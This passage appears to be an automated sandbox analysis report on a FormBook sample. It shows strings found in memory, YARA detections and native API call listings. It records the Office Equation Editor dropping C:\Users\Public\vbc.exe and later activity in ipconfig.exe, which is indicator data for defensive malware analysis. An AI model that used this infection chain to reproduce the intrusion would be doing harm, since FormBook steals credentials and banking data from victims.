          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2184570235.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2183945867.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2166184951.0000000001FE0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2169244442.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: C:\Users\Public\vbc.exe Code function: 4_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]
          Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe Code function: 5_2_004181C0 NtCreateFile
          Source: C:\Users\Public\vbc.exe Code function: 5_2_00418270 NtReadFile
          Source: C:\Users\Public\vbc.exe Code function: 5_2_004182F0 NtClose
          Source: C:\Users\Public\vbc.exe Code function: 5_2_004183A0 NtAllocateVirtualMemory
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0041817A NtCreateFile
          Source: C:\Users\Public\vbc.exe Code function: 5_2_004181BA NtCreateFile
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0041826A NtReadFile
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008D00C4 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008D0048 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008D0078 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008D07AC NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CF9F0 NtClose,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CF900 NtReadFile,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFAD0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFAE8 NtQueryInformationProcess,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFBB8 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFB68 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFC90 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFC60 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFD8C NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFDC0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFEA0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFED0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFFB4 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008D10D0 NtOpenProcessToken
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008D0060 NtQuerySection
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008D01D4 NtSetValueKey
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008D010C NtOpenDirectoryObject
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008D1148 NtOpenThread
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CF8CC NtWaitForSingleObject
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CF938 NtWriteFile
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008D1930 NtSetContextThread
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFAB8 NtQueryValueKey
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFA20 NtQueryInformationFile
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFA50 NtEnumerateValueKey
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFBE8 NtQueryVirtualMemory
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFB50 NtCreateKey
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFC30 NtOpenProcess
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFC48 NtSetInformationFile
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008D0C40 NtGetContextThread
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008D1D80 NtSuspendThread
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFD5C NtEnumerateKey
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFE24 NtWriteVirtualMemory
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFFFC NtCreateProcessEx
          Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFF34 NtQueueApcThread
          Source: C:\Users\Public\vbc.exe Code function: 5_1_004181C0 NtCreateFile
          Source: C:\Users\Public\vbc.exe Code function: 5_1_00418270 NtReadFile
          Source: C:\Users\Public\vbc.exe Code function: 5_1_004182F0 NtClose
          Source: C:\Users\Public\vbc.exe Code function: 5_1_004183A0 NtAllocateVirtualMemory
          Source: C:\Users\Public\vbc.exe Code function: 5_1_0041817A NtCreateFile
          Source: C:\Users\Public\vbc.exe Code function: 5_1_004181BA NtCreateFile
          Source: C:\Users\Public\vbc.exe Code function: 5_1_0041826A NtReadFile
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 7_2_020B00C4 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B07AC NtCreateMutant,LdrInitializeThunk,7_2_020B07AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_020AFAE8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFB50 NtCreateKey,LdrInitializeThunk,7_2_020AFB50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_020AFB68
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_020AFBB8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF900 NtReadFile,LdrInitializeThunk,7_2_020AF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF9F0 NtClose,LdrInitializeThunk,7_2_020AF9F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_020AFED0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFFB4 NtCreateSection,LdrInitializeThunk,7_2_020AFFB4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC60 NtMapViewOfSection,LdrInitializeThunk,7_2_020AFC60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFD8C NtDelayExecution,LdrInitializeThunk,7_2_020AFD8C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_020AFDC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0048 NtProtectVirtualMemory,7_2_020B0048
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0060 NtQuerySection,7_2_020B0060
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0078 NtResumeThread,7_2_020B0078
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B10D0 NtOpenProcessToken,7_2_020B10D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B010C NtOpenDirectoryObject,7_2_020B010C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B1148 NtOpenThread,7_2_020B1148
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B01D4 NtSetValueKey,7_2_020B01D4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFA20 NtQueryInformationFile,7_2_020AFA20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFA50 NtEnumerateValueKey,7_2_020AFA50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFAB8 NtQueryValueKey,7_2_020AFAB8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFAD0 NtAllocateVirtualMemory,7_2_020AFAD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFBE8 NtQueryVirtualMemory,7_2_020AFBE8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF8CC NtWaitForSingleObject,7_2_020AF8CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF938 NtWriteFile,7_2_020AF938
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B1930 NtSetContextThread,7_2_020B1930
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFE24 NtWriteVirtualMemory,7_2_020AFE24
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFEA0 NtReadVirtualMemory,7_2_020AFEA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFF34 NtQueueApcThread,7_2_020AFF34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFFFC NtCreateProcessEx,7_2_020AFFFC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC30 NtOpenProcess,7_2_020AFC30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC48 NtSetInformationFile,7_2_020AFC48
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0C40 NtGetContextThread,7_2_020B0C40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC90 NtUnmapViewOfSection,7_2_020AFC90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFD5C NtEnumerateKey,7_2_020AFD5C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B1D80 NtSuspendThread,7_2_020B1D80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000981C0 NtCreateFile,7_2_000981C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00098270 NtReadFile,7_2_00098270
